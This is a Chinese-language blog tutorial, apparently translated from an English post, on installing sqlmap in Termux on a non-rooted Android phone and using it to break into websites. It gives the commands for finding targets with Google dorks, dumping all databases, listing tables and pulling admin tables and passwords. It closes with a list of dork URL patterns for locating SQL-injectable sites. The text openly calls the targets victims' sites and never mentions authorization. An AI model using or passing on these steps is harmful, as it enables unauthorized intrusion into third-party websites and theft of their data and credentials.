如何在没有ROOT访问的Android上执行SQL注入
作者:admin | 时间:2018-4-25 09:51:13 | 分类:黑客技术 隐藏侧边栏展开侧边栏
大家好,今天我将向您展示如何在没有root权限的情况下在Android上安装SQLMAP,并使用SQL注入攻击网站。
sqlmap是为Linux设计的,它基于一些基本的SQL注入漏洞,如盲注,时间注入,报错注入等。我个人发现了这个技巧并将它带给你们,这适用于非ROOT手机而且它不需要太多的空间来安装。所以你可以使用它几乎不需要20MB储存。
此外它不需要任何Linux发行版,您可以在小型手机中使用它。而且我亲自在许多手机上进行了测试,它都能正常工作。
附上一条独家视频,它会帮助您更好地理解!
让我们开始吧!
要求
Termux (Linux终端包含许多内置命令)
Sqlmap (用于SQL注入)
文件管理器 (查看日志和数据库)
Android上的SQLMAP:安装
首先安装上述链接中的所有应用程序并至少运行一次。下载SqlMap的ZIP文件并解压它在SD卡中并更改其名称。
之后,打开Termux并运行命令。
apt update && apt upgrade
它需要一些时间来更新,会提示你需要一些空间。您只需简单安装,按y即可。
如果您使用的是Android 6.0+版手机,那么您需要运行此命令,或者如果您使用较低版本,则可以跳过。这不是强制性的,但我建议你运行它。
termux-setup-storage
它会提示允许使用你的内部存储。继续点击允许按钮,然后执行下一步。
packages install python2
该命令将在您的termux中安装Python。输入y以在termux中安装python2。
继续!
可以了,好了!你只需要在手机中找到sqlmap.py脚本。为了实现这一点,首先你需要访问根文件夹,所以首先运行:
cd /
然后输入
cd sdcard
cd ls
它会显示所有包含的文件。现在你需要找到sqlmap-master (提取的文件夹)。
cd sqlmap-master
cd sqlmap-master
输入sqlmap-master(上面的命令)两次。
如果您已经将sqlmap-master的名称更改为sqlmap, 那么您可以运行,
cd sqlmap
cd sqlmap-master
您可以借助 “ ls” 命令列出该位置的所有文件。
cd到存储sqlmap.py的sqlmap-master文件夹。现在运行sqlmap你需要下面的命令:
python2 sqlmap.py
如果你看到这个红色的sqlmap后就证明你完成了sqlmap的安装。下一步是使用sqlmap入侵网站,需要找到有SQL漏洞的网站。为此,请使用sqlmap google dork来查找网站。
如果您使用的是Google dork,请输入以下内容:
python2 sqlmap.py -g your_keyword
如果你想使用直接URL, 那么:
python2 sqlmap.py -u your_url
你可以参考sqlmap的官方文档帮助,或者只需键入python2 sqlmap.py -h 查看基本帮助和 python2 sqlmap.py -hh 查看高级帮助。
如果你想破解整个网站的所有的数据库和表格,只需将-a 添加到任一命令中 python2 sqlmap.py -g your_keyword 或 python2 sqlmap.py -u your_url
在google dork中,它会给你三个选项:
1.是攻击第一个站点,从而产生结果。为了进一步处理,你需要输入“y”。
2.跳到下一个目标,你可以使用“n”。
3.退出时,使用“q”。
设置攻击!
之后它将开始攻击受害者的网站。等到它完成,可能会提示您以下问题,只需点击“y”即可。
之后,它会向您显示几个表格和其他入侵数据。不用担心,当进程完成时,您可以在日志中查看它。
现在,如果你想看到所有的表,你需要运行以下命令:
python2 sqlmap.py -u url --tables
现在只需输入以下命令即可选择要查看的表。一般情况下,我想查看管理表、要查看密码,运行
python2 sqlmap.py -u url -T your_table name
这个命令会将你的表数据和日志文件保存在root文件夹中,这对于普通的非root用户来说是不可访问的,但不用担心,我们可以解决这个终端可以访问的问题,所以我们将把这个文件复制到你的内部存储器中
cp source //sdcard
只需用上述命令替换源代码,它将省略转储文件,现在使用内置文件管理器或使用ES文件管理器导航到文件位置
成功!您在Android上使用sqlmap成功入侵网站。
谷歌语法
我在这里给出了一些重要的dorks,所以你可以很容易地找到易受SQL攻击的站点!
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
原文:https://www.hackeroyale.com/sqlmap-on-android-nonrooted-tutorial/
华盟网,作者:AlexFrankly